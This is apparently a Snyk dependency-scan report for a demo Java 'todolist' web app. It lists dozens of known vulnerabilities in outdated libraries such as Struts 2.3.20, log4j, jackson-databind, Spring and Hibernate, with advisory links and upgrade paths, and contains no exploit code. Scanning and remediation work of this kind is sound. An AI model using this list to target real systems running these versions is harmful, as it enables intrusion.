+- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on 
com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ Medium severity vulnerability found on com.fasterxml.jackson.core:jackson-core@2.6.5 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-core@2.6.5 + + +✗ Medium severity vulnerability found on com.fasterxml.jackson.core:jackson-core@2.6.5 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-core@2.6.5 + + +✗ Medium severity vulnerability found on commons-collections:commons-collections@3.1 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-472711 +- from: 
io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > commons-collections:commons-collections@3.1 + + +✗ High severity vulnerability found on commons-fileupload:commons-fileupload@1.3.1 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > commons-fileupload:commons-fileupload@1.3.1 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.30 (triggers upgrades to commons-fileupload:commons-fileupload@1.3.2) + +✗ Medium severity vulnerability found on commons-fileupload:commons-fileupload@1.3.1 +- desc: Information Exposure +- info: https://snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-31540 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > commons-fileupload:commons-fileupload@1.3.1 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.30 (triggers upgrades to commons-fileupload:commons-fileupload@1.3.2) + +✗ Medium severity vulnerability found on commons-fileupload:commons-fileupload@1.3.1 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-3326457 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > commons-fileupload:commons-fileupload@1.3.1 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@6.1.2 (triggers upgrades to commons-fileupload:commons-fileupload@1.5) + +✗ Medium severity vulnerability found on commons-io:commons-io@2.2 +- desc: Directory Traversal +- info: https://snyk.io/vuln/SNYK-JAVA-COMMONSIO-1277109 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > commons-io:commons-io@2.2 +Upgrade direct dependency 
org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@6.0.0 (triggers upgrades to commons-io:commons-io@2.9.0) + +✗ High severity vulnerability found on dom4j:dom4j@1.6.1 +- desc: XML External Entity (XXE) Injection +- info: https://snyk.io/vuln/SNYK-JAVA-DOM4J-174153 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > io.github.snyk:todolist-core@0.0.1-SNAPSHOT > org.hibernate:hibernate-core@4.3.7.Final > dom4j:dom4j@1.6.1 + + +✗ High severity vulnerability found on dom4j:dom4j@1.6.1 +- desc: XML External Entity (XXE) Injection +- info: https://snyk.io/vuln/SNYK-JAVA-DOM4J-2812975 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > io.github.snyk:todolist-core@0.0.1-SNAPSHOT > org.hibernate:hibernate-core@4.3.7.Final > dom4j:dom4j@1.6.1 + + +✗ High severity vulnerability found on javax.servlet:jstl@1.2 +- desc: XML External Entity (XXE) Injection +- info: https://snyk.io/vuln/SNYK-JAVA-JAVAXSERVLET-30449 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > javax.servlet:jstl@1.2 + + +✗ Medium severity vulnerability found on ognl:ognl@3.0.6 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-OGNL-30474 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > ognl:ognl@3.0.6 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.28 (triggers upgrades to ognl:ognl@3.0.13) + +✗ High severity vulnerability found on org.apache.logging.log4j:log4j-core@2.7 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.logging.log4j:log4j-core@2.7 +Upgrade direct dependency org.apache.logging.log4j:log4j-core@2.7 to 
org.apache.logging.log4j:log4j-core@2.12.3 + +✗ Medium severity vulnerability found on org.apache.logging.log4j:log4j-core@2.7 +- desc: Arbitrary Code Execution +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.logging.log4j:log4j-core@2.7 +Upgrade direct dependency org.apache.logging.log4j:log4j-core@2.7 to org.apache.logging.log4j:log4j-core@2.12.4 + +✗ Low severity vulnerability found on org.apache.logging.log4j:log4j-core@2.7 +- desc: Man-in-the-Middle (MitM) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-567761 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.logging.log4j:log4j-core@2.7 +Upgrade direct dependency org.apache.logging.log4j:log4j-core@2.7 to org.apache.logging.log4j:log4j-core@2.13.2 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Remote Code Execution (RCE) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-2635340 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.5.30 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Manipulation of Struts' internals +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-30060 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.24.1 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Command Injection +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-30770 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.20.3 + 
+✗ Medium severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Cross-site Scripting (XSS) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-30773 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.28 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Cross-site Request Forgery (CSRF) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-30774 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.29 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Access Restriction Bypass +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-30775 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.29 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Access Restriction Bypass +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-30776 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.29 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Arbitrary Command Execution +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-31495 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.34 + +✗ High severity vulnerability found on 
org.apache.struts:struts2-core@2.3.20 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-31500 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.33 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-31501 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.34 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-31502 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.34 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Remote Code Execution +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-32477 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.35 + +✗ Medium severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Regular Expression Denial of Service (ReDoS) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-460223 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.29 + +✗ Medium severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Allocation of Resources 
Without Limits or Throttling +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-5707101 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.5.31 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-608098 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.5.22 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Unrestricted Upload of File with Dangerous Type +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-609765 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.5 + +✗ Medium severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Denial of Service +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-6100744 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.5.32 + +✗ High severity vulnerability found on org.apache.struts.xwork:xwork-core@2.3.20 +- desc: Parameter Alteration +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTSXWORK-30798 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > org.apache.struts.xwork:xwork-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.24.1 (triggers upgrades to org.apache.struts.xwork:xwork-core@2.3.24.1) + +✗ High severity vulnerability found on 
org.apache.struts.xwork:xwork-core@2.3.20 +- desc: Improper Input Validation +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTSXWORK-30799 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > org.apache.struts.xwork:xwork-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.28 (triggers upgrades to org.apache.struts.xwork:xwork-core@2.3.28) + +✗ Medium severity vulnerability found on org.apache.struts.xwork:xwork-core@2.3.20 +- desc: Cross-site Scripting (XSS) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTSXWORK-30800 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > org.apache.struts.xwork:xwork-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.28 (triggers upgrades to org.apache.struts.xwork:xwork-core@2.3.28) + +✗ Medium severity vulnerability found on org.apache.struts.xwork:xwork-core@2.3.20 +- desc: Improper Input Validation +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTSXWORK-30801 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > org.apache.struts.xwork:xwork-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.24.3 (triggers upgrades to org.apache.struts.xwork:xwork-core@2.3.24.3) + +✗ High severity vulnerability found on org.apache.struts.xwork:xwork-core@2.3.20 +- desc: Access Restriction Bypass +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTSXWORK-30802 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > org.apache.struts.xwork:xwork-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.29 (triggers upgrades to org.apache.struts.xwork:xwork-core@2.3.29) + +✗ High severity vulnerability 
found on org.apache.struts.xwork:xwork-core@2.3.20 +- desc: Arbitrary Code Execution +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTSXWORK-30803 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > org.apache.struts.xwork:xwork-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.29 (triggers upgrades to org.apache.struts.xwork:xwork-core@2.3.29) + +✗ Medium severity vulnerability found on org.apache.struts.xwork:xwork-core@2.3.20 +- desc: Regular Expression Denial of Service (ReDoS) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTSXWORK-30804 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > org.apache.struts.xwork:xwork-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.29 (triggers upgrades to org.apache.struts.xwork:xwork-core@2.3.29) + +✗ High severity vulnerability found on org.apache.struts.xwork:xwork-core@2.3.20 +- desc: Command Injection +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTSXWORK-451611 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > org.apache.struts.xwork:xwork-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.20.3 (triggers upgrades to org.apache.struts.xwork:xwork-core@2.3.20.3) + +✗ High severity vulnerability found on org.apache.struts.xwork:xwork-core@2.3.20 +- desc: Insecure Defaults +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTSXWORK-474418 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > org.apache.struts.xwork:xwork-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.20.1 (triggers upgrades to org.apache.struts.xwork:xwork-core@2.3.20.1) + +✗ High severity 
vulnerability found on org.apache.struts.xwork:xwork-core@2.3.20 +- desc: Improper Input Validation +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTSXWORK-5811864 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > org.apache.struts.xwork:xwork-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.24.1 (triggers upgrades to org.apache.struts.xwork:xwork-core@2.3.24.1) + +✗ High severity vulnerability found on org.freemarker:freemarker@2.3.19 +- desc: Server-side Template Injection (SSTI) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGFREEMARKER-1076795 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > org.freemarker:freemarker@2.3.19 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.5.25 (triggers upgrades to org.freemarker:freemarker@2.3.30) + +✗ High severity vulnerability found on org.hibernate:hibernate-core@4.3.7.Final +- desc: SQL Injection +- info: https://snyk.io/vuln/SNYK-JAVA-ORGHIBERNATE-1041788 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > io.github.snyk:todolist-core@0.0.1-SNAPSHOT > org.hibernate:hibernate-core@4.3.7.Final + + +✗ High severity vulnerability found on org.hibernate:hibernate-core@4.3.7.Final +- desc: SQL Injection +- info: https://snyk.io/vuln/SNYK-JAVA-ORGHIBERNATE-584563 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > io.github.snyk:todolist-core@0.0.1-SNAPSHOT > org.hibernate:hibernate-core@4.3.7.Final + + +✗ Medium severity vulnerability found on org.hibernate:hibernate-validator@4.3.1.Final +- desc: JSM bypass via ReflectionHelper +- info: https://snyk.io/vuln/SNYK-JAVA-ORGHIBERNATE-30098 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > 
io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > org.hibernate:hibernate-validator@4.3.1.Final
+
+
+✗ Medium severity vulnerability found on org.hibernate:hibernate-validator@4.3.1.Final
+- desc: Improper Input Validation
+- info: https://snyk.io/vuln/SNYK-JAVA-ORGHIBERNATE-568162
+- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > org.hibernate:hibernate-validator@4.3.1.Final
+
+
+✗ Medium severity vulnerability found on org.hibernate:hibernate-validator@4.3.1.Final
+- desc: Cross-site Scripting (XSS)
+- info: https://snyk.io/vuln/SNYK-JAVA-ORGHIBERNATE-569100
+- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > org.hibernate:hibernate-validator@4.3.1.Final
+
+
+✗ High severity vulnerability found on org.hsqldb:hsqldb@2.3.2
+- desc: Remote Code Execution (RCE)
+- info: https://snyk.io/vuln/SNYK-JAVA-ORGHSQLDB-3040860
+- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > io.github.snyk:todolist-core@0.0.1-SNAPSHOT > org.hsqldb:hsqldb@2.3.2
+
+
+✗ High severity vulnerability found on org.springframework:spring-web@3.2.6.RELEASE
+- desc: Improper Input Validation
+- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-1009832
+- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE
+Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@4.3.29.RELEASE
+
+✗ High severity vulnerability found on org.springframework:spring-web@3.2.6.RELEASE
+- desc: XML External Entity (XXE) Injection
+- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-30163
+- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE
+Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@3.2.9.RELEASE
+
+✗ Medium severity 
vulnerability found on org.springframework:spring-web@3.2.6.RELEASE
+- desc: Denial of Service (DoS)
+- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-30164
+- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE
+Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@3.2.14.RELEASE
+
+✗ High severity vulnerability found on org.springframework:spring-web@3.2.6.RELEASE
+- desc: Reflected File Download
+- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-30165
+- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE
+Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@3.2.15.RELEASE
+
+✗ Medium severity vulnerability found on org.springframework:spring-web@3.2.6.RELEASE
+- desc: Cross-site Request Forgery (CSRF)
+- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-31331
+- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE
+Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@3.2.8.RELEASE
+
+✗ High severity vulnerability found on org.springframework:spring-web@3.2.6.RELEASE
+- desc: Open Redirect
+- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586
+- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE
+Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@5.3.32
+
+✗ High severity vulnerability found on org.springframework:spring-web@3.2.6.RELEASE
+- desc: Open Redirect
+- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790
+- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE
+Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to 
org.springframework:spring-web@5.3.33
+
+✗ Medium severity vulnerability found on org.springframework:spring-web@3.2.6.RELEASE
+- desc: Open Redirect
+- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980
+- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE
+Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@5.3.34
+
+✗ Medium severity vulnerability found on org.springframework:spring-core@3.2.6.RELEASE
+- desc: Improper Output Neutralization for Logs
+- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097
+- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE > org.springframework:spring-core@3.2.6.RELEASE
+Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@5.2.18.RELEASE (triggers upgrades to org.springframework:spring-core@5.2.18.RELEASE)
+
+✗ Medium severity vulnerability found on org.springframework:spring-core@3.2.6.RELEASE
+- desc: Improper Input Validation
+- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878
+- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE > org.springframework:spring-core@3.2.6.RELEASE
+Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@5.2.19.RELEASE (triggers upgrades to org.springframework:spring-core@5.2.19.RELEASE)
+
+✗ Medium severity vulnerability found on org.springframework:spring-core@3.2.6.RELEASE
+- desc: Directory Traversal
+- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-31325
+- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE > org.springframework:spring-core@3.2.6.RELEASE
+Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@3.2.9.RELEASE (triggers 
upgrades to org.springframework:spring-core@3.2.9.RELEASE)
+
+✗ Medium severity vulnerability found on org.springframework:spring-expression@3.2.6.RELEASE
+- desc: Denial of Service (DoS)
+- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828
+- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE > org.springframework:spring-context@3.2.6.RELEASE > org.springframework:spring-expression@3.2.6.RELEASE
+Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@5.0.0.RELEASE
+
+✗ Medium severity vulnerability found on org.springframework:spring-expression@3.2.6.RELEASE
+- desc: Allocation of Resources Without Limits or Throttling
+- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749
+- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE > org.springframework:spring-context@3.2.6.RELEASE > org.springframework:spring-expression@3.2.6.RELEASE
+Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@5.0.0.RELEASE
+
+✗ Medium severity vulnerability found on org.springframework:spring-expression@3.2.6.RELEASE
+- desc: Allocation of Resources Without Limits or Throttling
+- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217
+- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE > org.springframework:spring-context@3.2.6.RELEASE > org.springframework:spring-expression@3.2.6.RELEASE
+Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@5.0.0.RELEASE
+
+✗ Medium severity vulnerability found on org.springframework:spring-beans@3.2.6.RELEASE
+- desc: Denial of Service (DoS)
+- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313
+- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE > 
org.springframework:spring-beans@3.2.6.RELEASE
